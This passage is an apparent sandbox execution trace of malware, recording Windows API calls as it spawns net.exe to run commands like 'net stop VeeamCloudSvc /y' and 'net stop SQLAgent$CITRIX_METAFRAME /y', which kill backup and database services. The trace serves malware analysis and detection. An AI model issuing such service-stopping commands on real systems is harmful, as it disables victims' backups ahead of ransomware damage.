[0209.906] GetFileType (hFile=0x26c) returned 0x3 [0209.906] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4c62a8 [0209.906] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4c62a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nL", lpUsedDefaultChar=0x0) returned 2 [0209.906] WriteFile (in: hFile=0x26c, lpBuffer=0x4c62a8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x13f880, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x13f880, lpOverlapped=0x0) returned 0 [0209.907] LocalFree (hMem=0x4c62a8) returned 0x0 [0209.907] NetApiBufferFree (Buffer=0x4c1c70) returned 0x0 [0209.907] NetApiBufferFree (Buffer=0x4c1c88) returned 0x0 [0209.907] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$TPSAMA /y" [0209.907] exit (_Code=2) Process: id = "278" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x2107b000" os_pid = "0x3a0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop SQLAgent$CITRIX_METAFRAME /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 451 os_tid = 0x710 Process: id = "279" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x63ad4000" os_pid = "0x5f4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "278" os_parent_pid = "0x3a0" cmd_line = "C:\\Windows\\system32\\net1 stop SQLAgent$CITRIX_METAFRAME /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 452 os_tid = 0x4ec [0210.040] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1df7e8 | out: lpSystemTimeAsFileTime=0x1df7e8*(dwLowDateTime=0x466119c0, dwHighDateTime=0x1d57a87)) [0210.040] GetCurrentProcessId () returned 0x5f4 [0210.040] GetCurrentThreadId () returned 0x4ec [0210.040] GetTickCount () returned 0x116e189 [0210.040] QueryPerformanceCounter (in: lpPerformanceCount=0x1df7e0 | out: lpPerformanceCount=0x1df7e0*=33032464689) returned 1 [0210.040] GetModuleHandleA (lpModuleName=0x0) returned 0xb0000 [0210.040] __set_app_type (_Type=0x1) [0210.040] __p__fmode () returned 0x74eb31f4 [0210.040] __p__commode () returned 0x74eb31fc [0210.041] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xbffe6) returned 0x0 [0210.041] __getmainargs (in: _Argc=0xc9064, _Argv=0xc906c, _Env=0xc9068, _DoWildCard=0, _StartInfo=0xc9024 | out: _Argc=0xc9064, _Argv=0xc906c, _Env=0xc9068) returned 0 [0210.041] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0210.041] GetConsoleOutputCP () returned 0x1b5 [0210.041] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xc9080 | out: lpCPInfo=0xc9080) returned 1 [0210.041] SetThreadUILanguage (LangId=0x0) returned 0x409 [0210.044] sprintf_s (in: _DstBuf=0x1df7a0, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0210.044] setlocale (category=0, locale=".437") returned="English_United States.437" [0210.046] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0210.046] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0210.046] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$CITRIX_METAFRAME /y" [0210.046] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1df56c, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0210.046] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x86) returned 0x644bf8 [0210.047] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0210.047] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1df770 | out: Buffer=0x1df770*=0x641c90) returned 0x0 [0210.047] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1df770 | out: Buffer=0x1df770*=0x641ca8) returned 0x0 [0210.047] _fileno (_File=0x74eb2900) returned -2 [0210.047] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0210.047] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0210.047] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0210.047] _wcsicmp (_String1="config", _String2="stop") returned -16 [0210.047] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0210.047] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0210.047] _wcsicmp (_String1="file", _String2="stop") returned -13 [0210.047] _wcsicmp (_String1="files", _String2="stop") returned -13 [0210.047] _wcsicmp (_String1="group", _String2="stop") returned -12 [0210.047] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0210.047] _wcsicmp (_String1="help", _String2="stop") returned -11 [0210.047] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0210.047] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0210.047] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0210.047] _wcsicmp (_String1="session", _String2="stop") returned -15 [0210.047] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0210.047] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0210.048] _wcsicmp (_String1="share", _String2="stop") returned -12 [0210.048] _wcsicmp (_String1="start", _String2="stop") returned -14 [0210.048] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0210.048] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0210.048] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0210.048] _wcsicmp (_String1="accounts", _String2="SQLAgent$CITRIX_METAFRAME") returned -18 [0210.048] _wcsicmp (_String1="computer", _String2="SQLAgent$CITRIX_METAFRAME") returned -16 [0210.048] _wcsicmp (_String1="config", _String2="SQLAgent$CITRIX_METAFRAME") returned -16 [0210.048] _wcsicmp (_String1="continue", _String2="SQLAgent$CITRIX_METAFRAME") returned -16 [0210.048] _wcsicmp (_String1="cont", _String2="SQLAgent$CITRIX_METAFRAME") returned -16 [0210.048] _wcsicmp (_String1="file", _String2="SQLAgent$CITRIX_METAFRAME") returned -13 [0210.048] _wcsicmp (_String1="files", _String2="SQLAgent$CITRIX_METAFRAME") returned -13 [0210.048] _wcsicmp (_String1="group", _String2="SQLAgent$CITRIX_METAFRAME") returned -12 [0210.048] _wcsicmp (_String1="groups", _String2="SQLAgent$CITRIX_METAFRAME") returned -12 [0210.048] _wcsicmp (_String1="help", _String2="SQLAgent$CITRIX_METAFRAME") returned -11 [0210.048] _wcsicmp (_String1="helpmsg", _String2="SQLAgent$CITRIX_METAFRAME") returned -11 [0210.048] _wcsicmp (_String1="localgroup", _String2="SQLAgent$CITRIX_METAFRAME") returned -7 [0210.048] _wcsicmp (_String1="pause", _String2="SQLAgent$CITRIX_METAFRAME") returned -3 [0210.048] _wcsicmp (_String1="session", _String2="SQLAgent$CITRIX_METAFRAME") returned -12 [0210.048] _wcsicmp (_String1="sessions", _String2="SQLAgent$CITRIX_METAFRAME") returned -12 [0210.048] _wcsicmp (_String1="sess", _String2="SQLAgent$CITRIX_METAFRAME") returned -12 [0210.048] _wcsicmp (_String1="share", _String2="SQLAgent$CITRIX_METAFRAME") returned -9 [0210.048] _wcsicmp (_String1="start", _String2="SQLAgent$CITRIX_METAFRAME") returned 3 [0210.048] _wcsicmp (_String1="stats", _String2="SQLAgent$CITRIX_METAFRAME") returned 3 [0210.048] _wcsicmp (_String1="statistics", _String2="SQLAgent$CITRIX_METAFRAME") returned 3 [0210.048] _wcsicmp (_String1="stop", _String2="SQLAgent$CITRIX_METAFRAME") returned 3 [0210.048] _wcsicmp (_String1="time", _String2="SQLAgent$CITRIX_METAFRAME") returned 1 [0210.048] _wcsicmp (_String1="user", _String2="SQLAgent$CITRIX_METAFRAME") returned 2 [0210.048] _wcsicmp (_String1="users", _String2="SQLAgent$CITRIX_METAFRAME") returned 2 [0210.048] _wcsicmp (_String1="msg", _String2="SQLAgent$CITRIX_METAFRAME") returned -6 [0210.048] _wcsicmp (_String1="messenger", _String2="SQLAgent$CITRIX_METAFRAME") returned -6 [0210.048] _wcsicmp (_String1="receiver", _String2="SQLAgent$CITRIX_METAFRAME") returned -1 [0210.048] _wcsicmp (_String1="rcv", _String2="SQLAgent$CITRIX_METAFRAME") returned -1 [0210.048] _wcsicmp (_String1="netpopup", _String2="SQLAgent$CITRIX_METAFRAME") returned -5 [0210.048] _wcsicmp (_String1="redirector", _String2="SQLAgent$CITRIX_METAFRAME") returned -1 [0210.048] _wcsicmp (_String1="redir", _String2="SQLAgent$CITRIX_METAFRAME") returned -1 [0210.049] _wcsicmp (_String1="rdr", _String2="SQLAgent$CITRIX_METAFRAME") returned -1 [0210.049] _wcsicmp (_String1="workstation", _String2="SQLAgent$CITRIX_METAFRAME") returned 4 [0210.049] _wcsicmp (_String1="work", _String2="SQLAgent$CITRIX_METAFRAME") returned 4 [0210.049] _wcsicmp (_String1="wksta", _String2="SQLAgent$CITRIX_METAFRAME") returned 4 [0210.049] _wcsicmp (_String1="prdr", _String2="SQLAgent$CITRIX_METAFRAME") returned -3 [0210.049] _wcsicmp (_String1="devrdr", _String2="SQLAgent$CITRIX_METAFRAME") returned -15 [0210.049] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAgent$CITRIX_METAFRAME") returned -7 [0210.049] _wcsicmp (_String1="server", _String2="SQLAgent$CITRIX_METAFRAME") returned -12 [0210.049] _wcsicmp (_String1="svr", _String2="SQLAgent$CITRIX_METAFRAME") returned 5 [0210.049] _wcsicmp (_String1="srv", _String2="SQLAgent$CITRIX_METAFRAME") returned 1 [0210.049] _wcsicmp (_String1="lanmanserver", _String2="SQLAgent$CITRIX_METAFRAME") returned -7 [0210.049] _wcsicmp (_String1="alerter", _String2="SQLAgent$CITRIX_METAFRAME") returned -18 [0210.049] _wcsicmp (_String1="netlogon", _String2="SQLAgent$CITRIX_METAFRAME") returned -5 [0210.049] _wcsupr (in: _String="SQLAgent$CITRIX_METAFRAME" | out: _String="SQLAGENT$CITRIX_METAFRAME") returned="SQLAGENT$CITRIX_METAFRAME" [0210.049] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x6454d0 [0210.051] GetServiceKeyNameW (in: hSCManager=0x6454d0, lpDisplayName="SQLAGENT$CITRIX_METAFRAME", lpServiceName=0xcaaf0, lpcchBuffer=0x1df70c | out: lpServiceName="", lpcchBuffer=0x1df70c) returned 0 [0210.052] _wcsicmp (_String1="msg", _String2="SQLAGENT$CITRIX_METAFRAME") returned -6 [0210.052] _wcsicmp (_String1="messenger", _String2="SQLAGENT$CITRIX_METAFRAME") returned -6 [0210.052] _wcsicmp (_String1="receiver", _String2="SQLAGENT$CITRIX_METAFRAME") returned -1 [0210.052] _wcsicmp (_String1="rcv", _String2="SQLAGENT$CITRIX_METAFRAME") returned -1 [0210.052] _wcsicmp (_String1="redirector", _String2="SQLAGENT$CITRIX_METAFRAME") returned -1 [0210.052] _wcsicmp (_String1="redir", _String2="SQLAGENT$CITRIX_METAFRAME") returned -1 [0210.052] _wcsicmp (_String1="rdr", _String2="SQLAGENT$CITRIX_METAFRAME") returned -1 [0210.052] _wcsicmp (_String1="workstation", _String2="SQLAGENT$CITRIX_METAFRAME") returned 4 [0210.052] _wcsicmp (_String1="work", _String2="SQLAGENT$CITRIX_METAFRAME") returned 4 [0210.052] _wcsicmp (_String1="wksta", _String2="SQLAGENT$CITRIX_METAFRAME") returned 4 [0210.052] _wcsicmp (_String1="prdr", _String2="SQLAGENT$CITRIX_METAFRAME") returned -3 [0210.052] _wcsicmp (_String1="devrdr", _String2="SQLAGENT$CITRIX_METAFRAME") returned -15 [0210.052] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAGENT$CITRIX_METAFRAME") returned -7 [0210.052] _wcsicmp (_String1="server", _String2="SQLAGENT$CITRIX_METAFRAME") returned -12 [0210.052] _wcsicmp (_String1="svr", _String2="SQLAGENT$CITRIX_METAFRAME") returned 5 [0210.052] _wcsicmp (_String1="srv", _String2="SQLAGENT$CITRIX_METAFRAME") returned 1 [0210.052] _wcsicmp (_String1="lanmanserver", _String2="SQLAGENT$CITRIX_METAFRAME") returned -7 [0210.052] _wcsicmp (_String1="alerter", _String2="SQLAGENT$CITRIX_METAFRAME") returned -18 [0210.052] _wcsicmp (_String1="netlogon", _String2="SQLAGENT$CITRIX_METAFRAME") returned -5 [0210.052] NetServiceControl (in: servername=0x0, service="SQLAGENT$CITRIX_METAFRAME", opcode=0x0, arg=0x0, bufptr=0x1df708 | out: bufptr=0x1df708) returned 0x889 [0210.053] wcscpy_s (in: _Destination=0xca4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0210.053] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0210.054] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xcb338, nSize=0x800, Arguments=0xc9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0210.055] GetFileType (hFile=0x26c) returned 0x3 [0210.055] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x643ca0 [0210.055] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x643ca0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0210.055] WriteFile (in: hFile=0x26c, lpBuffer=0x643ca0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x1df648, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1df648, lpOverlapped=0x0) returned 0 [0210.055] LocalFree (hMem=0x643ca0) returned 0x0 [0210.055] GetFileType (hFile=0x26c) returned 0x3 [0210.055] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x646298 [0210.055] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x646298, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nd", lpUsedDefaultChar=0x0) returned 2 [0210.055] WriteFile (in: hFile=0x26c, lpBuffer=0x646298, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1df648, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1df648, lpOverlapped=0x0) returned 0 [0210.055] LocalFree (hMem=0x646298) returned 0x0 [0210.055] _ultow (in: _Dest=0x889, _Radix=1963640 | out: _Dest=0x889) returned="2185" [0210.055] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xcb338, nSize=0x800, Arguments=0xc9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0210.056] GetFileType (hFile=0x26c) returned 0x3 [0210.056] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x646298 [0210.056] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x646298, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0210.056] WriteFile (in: hFile=0x26c, lpBuffer=0x646298, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x1df654, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1df654, lpOverlapped=0x0) returned 0 [0210.056] LocalFree (hMem=0x646298) returned 0x0 [0210.056] GetFileType (hFile=0x26c) returned 0x3 [0210.056] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x646298 [0210.056] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x646298, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nd", lpUsedDefaultChar=0x0) returned 2 [0210.056] WriteFile (in: hFile=0x26c, lpBuffer=0x646298, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1df654, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1df654, lpOverlapped=0x0) returned 0 [0210.056] LocalFree (hMem=0x646298) returned 0x0 [0210.057] NetApiBufferFree (Buffer=0x641c90) returned 0x0 [0210.057] NetApiBufferFree (Buffer=0x641ca8) returned 0x0 [0210.057] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$CITRIX_METAFRAME /y" [0210.057] exit (_Code=2) Process: id = "280" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x6c780000" os_pid = "0x38c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop VeeamCloudSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 453 os_tid = 0x360 Process: id = "281" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x4fe7a000" os_pid = "0x31c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "280" os_parent_pid = "0x38c" cmd_line = "C:\\Windows\\system32\\net1 stop VeeamCloudSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 454 os_tid = 0x4c8 [0210.188] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xdfb88 | out: lpSystemTimeAsFileTime=0xdfb88*(dwLowDateTime=0x4678e780, dwHighDateTime=0x1d57a87)) [0210.188] GetCurrentProcessId () returned 0x31c [0210.188] GetCurrentThreadId () returned 0x4c8 [0210.188] GetTickCount () returned 0x116e225 [0210.188] QueryPerformanceCounter (in: lpPerformanceCount=0xdfb80 | out: lpPerformanceCount=0xdfb80*=33047294902) returned 1 [0210.189] GetModuleHandleA (lpModuleName=0x0) returned 0xc00000 [0210.189] __set_app_type (_Type=0x1) [0210.189] __p__fmode () returned 0x74eb31f4 [0210.189] __p__commode () returned 0x74eb31fc [0210.189] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xc0ffe6) returned 0x0 [0210.189] __getmainargs (in: _Argc=0xc19064, _Argv=0xc1906c, _Env=0xc19068, _DoWildCard=0, _StartInfo=0xc19024 | out: _Argc=0xc19064, _Argv=0xc1906c, _Env=0xc19068) returned 0 [0210.189] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0210.189] GetConsoleOutputCP () returned 0x1b5 [0210.189] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xc19080 | out: lpCPInfo=0xc19080) returned 1 [0210.189] SetThreadUILanguage (LangId=0x0) returned 0x409 [0210.192] sprintf_s (in: _DstBuf=0xdfb40, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0210.192] setlocale (category=0, locale=".437") returned="English_United States.437" [0210.194] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0210.194] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0210.194] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamCloudSvc /y" [0210.194] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xdf90c, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0210.194] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x6e) returned 0x5a3c10 [0210.195] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0210.195] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xdfb10 | out: Buffer=0xdfb10*=0x5a1c70) returned 0x0 [0210.195] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xdfb10 | out: Buffer=0xdfb10*=0x5a1c88) returned 0x0 [0210.195] _fileno (_File=0x74eb2900) returned -2 [0210.195] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0210.195] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0210.195] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0210.195] _wcsicmp (_String1="config", _String2="stop") returned -16 [0210.195] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0210.195] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0210.195] _wcsicmp (_String1="file", _String2="stop") returned -13 [0210.195] _wcsicmp (_String1="files", _String2="stop") returned -13 [0210.195] _wcsicmp (_String1="group", _String2="stop") returned -12 [0210.195] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0210.195] _wcsicmp (_String1="help", _String2="stop") returned -11 [0210.195] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0210.195] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0210.195] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0210.195] _wcsicmp (_String1="session", _String2="stop") returned -15 [0210.198] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0210.198] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0210.198] _wcsicmp (_String1="share", _String2="stop") returned -12 [0210.198] _wcsicmp (_String1="start", _String2="stop") returned -14 [0210.198] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0210.198] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0210.198] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0210.198] _wcsicmp (_String1="accounts", _String2="VeeamCloudSvc") returned -21 [0210.198] _wcsicmp (_String1="computer", _String2="VeeamCloudSvc") returned -19 [0210.198] _wcsicmp (_String1="config", _String2="VeeamCloudSvc") returned -19 [0210.198] _wcsicmp (_String1="continue", _String2="VeeamCloudSvc") returned -19 [0210.198] _wcsicmp (_String1="cont", _String2="VeeamCloudSvc") returned -19 [0210.198] _wcsicmp (_String1="file", _String2="VeeamCloudSvc") returned -16 [0210.198] _wcsicmp (_String1="files", _String2="VeeamCloudSvc") returned -16 [0210.198] _wcsicmp (_String1="group", _String2="VeeamCloudSvc") returned -15 [0210.198] _wcsicmp (_String1="groups", _String2="VeeamCloudSvc") returned -15 [0210.198] _wcsicmp (_String1="help", _String2="VeeamCloudSvc") returned -14 [0210.198] _wcsicmp (_String1="helpmsg", _String2="VeeamCloudSvc") returned -14 [0210.198] _wcsicmp (_String1="localgroup", _String2="VeeamCloudSvc") returned -10 [0210.198] _wcsicmp (_String1="pause", _String2="VeeamCloudSvc") returned -6 [0210.198] _wcsicmp (_String1="session", _String2="VeeamCloudSvc") returned -3 [0210.198] _wcsicmp (_String1="sessions", _String2="VeeamCloudSvc") returned -3 [0210.198] _wcsicmp (_String1="sess", _String2="VeeamCloudSvc") returned -3 [0210.198] _wcsicmp (_String1="share", _String2="VeeamCloudSvc") returned -3 [0210.198] _wcsicmp (_String1="start", _String2="VeeamCloudSvc") returned -3 [0210.198] _wcsicmp (_String1="stats", _String2="VeeamCloudSvc") returned -3 [0210.198] _wcsicmp (_String1="statistics", _String2="VeeamCloudSvc") returned -3 [0210.198] _wcsicmp (_String1="stop", _String2="VeeamCloudSvc") returned -3 [0210.198] _wcsicmp (_String1="time", _String2="VeeamCloudSvc") returned -2 [0210.198] _wcsicmp (_String1="user", _String2="VeeamCloudSvc") returned -1 [0210.198] _wcsicmp (_String1="users", _String2="VeeamCloudSvc") returned -1 [0210.198] _wcsicmp (_String1="msg", _String2="VeeamCloudSvc") returned -9 [0210.199] _wcsicmp (_String1="messenger", _String2="VeeamCloudSvc") returned -9 [0210.199] _wcsicmp (_String1="receiver", _String2="VeeamCloudSvc") returned -4 [0210.199] _wcsicmp (_String1="rcv", _String2="VeeamCloudSvc") returned -4 [0210.199] _wcsicmp (_String1="netpopup", _String2="VeeamCloudSvc") returned -8 [0210.199] _wcsicmp (_String1="redirector", _String2="VeeamCloudSvc") returned -4 [0210.199] _wcsicmp (_String1="redir", _String2="VeeamCloudSvc") returned -4 [0210.199] _wcsicmp (_String1="rdr", _String2="VeeamCloudSvc") returned -4 [0210.199] _wcsicmp (_String1="workstation", _String2="VeeamCloudSvc") returned 1 [0210.199] _wcsicmp (_String1="work", _String2="VeeamCloudSvc") returned 1 [0210.199] _wcsicmp (_String1="wksta", _String2="VeeamCloudSvc") returned 1 [0210.199] _wcsicmp (_String1="prdr", _String2="VeeamCloudSvc") returned -6 [0210.199] _wcsicmp (_String1="devrdr", _String2="VeeamCloudSvc") returned -18 [0210.199] _wcsicmp (_String1="lanmanworkstation", _String2="VeeamCloudSvc") returned -10 [0210.199] _wcsicmp (_String1="server", _String2="VeeamCloudSvc") returned -3 [0210.199] _wcsicmp (_String1="svr", _String2="VeeamCloudSvc") returned -3 [0210.199] _wcsicmp (_String1="srv", _String2="VeeamCloudSvc") returned -3 [0210.199] _wcsicmp (_String1="lanmanserver", _String2="VeeamCloudSvc") returned -10 [0210.199] _wcsicmp (_String1="alerter", _String2="VeeamCloudSvc") returned -21 [0210.199] _wcsicmp (_String1="netlogon", _String2="VeeamCloudSvc") returned -8 [0210.199] _wcsupr (in: _String="VeeamCloudSvc" | out: _String="VEEAMCLOUDSVC") returned="VEEAMCLOUDSVC" [0210.199] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x5a54d0 [0210.202] GetServiceKeyNameW (in: hSCManager=0x5a54d0, lpDisplayName="VEEAMCLOUDSVC", lpServiceName=0xc1aaf0, lpcchBuffer=0xdfaac | out: lpServiceName="", lpcchBuffer=0xdfaac) returned 0 [0210.202] _wcsicmp (_String1="msg", _String2="VEEAMCLOUDSVC") returned -9 [0210.202] _wcsicmp (_String1="messenger", _String2="VEEAMCLOUDSVC") returned -9 [0210.202] _wcsicmp (_String1="receiver", _String2="VEEAMCLOUDSVC") returned -4 [0210.202] _wcsicmp (_String1="rcv", _String2="VEEAMCLOUDSVC") returned -4 [0210.202] _wcsicmp (_String1="redirector", _String2="VEEAMCLOUDSVC") returned -4 [0210.202] _wcsicmp (_String1="redir", _String2="VEEAMCLOUDSVC") returned -4 [0210.202] _wcsicmp (_String1="rdr", _String2="VEEAMCLOUDSVC") returned -4 [0210.203] _wcsicmp (_String1="workstation", _String2="VEEAMCLOUDSVC") returned 1 [0210.203] _wcsicmp (_String1="work", _String2="VEEAMCLOUDSVC") returned 1 [0210.203] _wcsicmp (_String1="wksta", _String2="VEEAMCLOUDSVC") returned 1 [0210.203] _wcsicmp (_String1="prdr", _String2="VEEAMCLOUDSVC") returned -6 [0210.203] _wcsicmp (_String1="devrdr", _String2="VEEAMCLOUDSVC") returned -18 [0210.203] _wcsicmp (_String1="lanmanworkstation", _String2="VEEAMCLOUDSVC") returned -10 